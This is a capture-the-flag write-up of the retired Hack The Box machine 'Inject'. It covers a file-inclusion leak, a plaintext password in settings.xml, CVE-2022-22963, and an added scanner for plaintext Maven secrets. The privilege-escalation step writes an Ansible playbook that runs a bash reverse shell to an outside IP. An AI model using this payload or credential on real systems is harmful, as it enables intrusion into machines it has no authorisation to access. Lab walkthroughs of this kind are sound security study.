HacktheBox - Inject

Author: gotNothingHere

Initial Enumeration

Web

We find LFI on

Leak on proc fd

Checking the Entrypoint file we see it is a SpringApplication

creds

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Checking pom.xml, we see it may be vulnerable to CVE-2022-22963.

After getting the shell we can su to phil using the password we had found in settings.xml
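
A defender-side check for the settings.xml finding above, as an added example that is not part of the original write-up: it parses a Maven settings.xml and reports server or proxy secrets stored as literals rather than in Maven's encrypted {...} form or as a ${...} property reference. The sample file and its values are constructed, and tags are matched by local name because the file above declares the POM namespace rather than the usual settings one.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the settings.xml above; all values are placeholders.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0">
  <servers>
    <server><id>Inject</id><username>phil</username>
      <password>EXAMPLE-PLAINTEXT</password></server>
    <server><id>encrypted</id>
      <password>{COQLCE6DU6GtcS5P=}</password></server>
    <server><id>from-env</id>
      <password>${env.REPO_PASSWORD}</password></server>
  </servers>
</settings>"""

SECRET_TAGS = {"password", "passphrase"}
HOLDERS = {"server", "proxy"}            # settings.xml elements that carry secrets
# A value is not a literal secret if it contains Maven's encrypted form
# ({...}) or a property reference (${...}) resolved at build time.
NON_LITERAL = re.compile(r"\$?\{[^{}]+\}")


def local(tag):
    """Drop the '{namespace}' prefix so any declared namespace matches."""
    return tag.rsplit("}", 1)[-1]


def plaintext_secrets(xml_text):
    """Return [(entry id, field)] for each secret stored as a literal."""
    findings = []
    root = ET.fromstring(xml_text)
    for entry in (e for e in root.iter() if local(e.tag) in HOLDERS):
        fields = {local(c.tag): (c.text or "").strip() for c in entry}
        for name in sorted(fields.keys() & SECRET_TAGS):
            value = fields[name]
            if value and not NON_LITERAL.search(value):
                findings.append((fields.get("id", "?"), name))
    return findings


if __name__ == "__main__":
    for entry_id, field in plaintext_secrets(SAMPLE):
        print(f"'{entry_id}': <{field}> is stored in plaintext")
```
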

Privilege Escalation

After getting a shell as phil, we see that we are part of the staff group.

In /opt/automations/tasks/ we find an Ansible playbook.

Using GTFOBins, we can create a payload as follows:

echo '[{hosts: localhost, tasks: [shell: /bin/bash -c "bash -i >& /dev/tcp/10.10.14.198/1337 0>&1"]}]' > playbook_2.yml

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/inject/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.